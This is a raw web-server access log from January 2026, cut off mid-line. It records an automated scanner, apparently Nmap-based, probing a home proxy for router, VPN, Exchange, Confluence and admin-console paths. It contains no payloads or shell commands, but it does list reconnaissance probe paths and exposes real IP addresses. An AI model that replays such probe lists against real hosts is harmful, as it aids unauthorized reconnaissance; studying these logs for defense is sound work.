91-82-83-208.pool.digikabel.hu "/info.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/status" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ise/img/rm-logo_small.png" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/server/version" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/home.jhtml" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/version" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/p/login/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 139.162.173.209] [Length 1033] [Gzip -] "-" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/confluence/rest/applinks/1.0/manifest" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/language/en-GB/en-GB.xml" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/versa/login" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-mod/header_logo.cgi?size=big" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login/login.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/allversions" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/images/logo.png" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/robots.txt" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webui" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lms/db" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/p/login/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/versions" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/r-seenet/index.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.php" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nmaplowercheck1769217586" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/index.html" [Client 139.162.173.209] [Length 1033] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2/about" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/phoenix/favicon.ico" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tos/index.php?user/login" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/portal/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/status" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/info.asp" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/portal/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dniapi/userInfos" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ise/img/rm-logo_small.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/main.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/HNAP1" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/param.cgi?get_device_conf" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/c/login" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/param.cgi?get_device_conf" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.jsp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/lms/db" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/kylin/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cslu/v1/core/conf" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/images/logo.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/check-version" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/robots.txt" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/version" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login/login.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/App_Themes/Default/Images/favicon.ico" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/r-seenet/index.php" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1.0/environment" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/config" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/owa/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/versions" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/pom.xml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/allversions" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ext-js/app/common/zld_product_spec.js" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/build.gradle" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/CHANGELOG.txt" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin/reports/updates" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/images/logo.gif" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/javascript/validation/OEM.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/tos/index.php?user/login" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin/reports/status" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dana-na/nc/nc_gina_ver.txt" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/c/login" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/assets/img/favicon.ico" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/officescan/console/html/localization.js" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.jsp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/authLogin.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/pandora_console/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/WebApp/js/UI_String.js" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login.aspx" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/centreon/api/latest/platform/versions" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/web/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/kylin/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/IPCamDesc.xml" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cslu/v1/core/conf" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1.0/environment" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v3/meta" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/css/elfinder.min.css" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/CHANGELOG.txt" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/config" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/app/ui/login.jsp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.jsp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin/reports/status" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login/?next=/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/officescan/console/html/localization.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/pom.xml" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/javascript/validation/OEM.js" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dashboard/favicon.ico" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/luci" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; 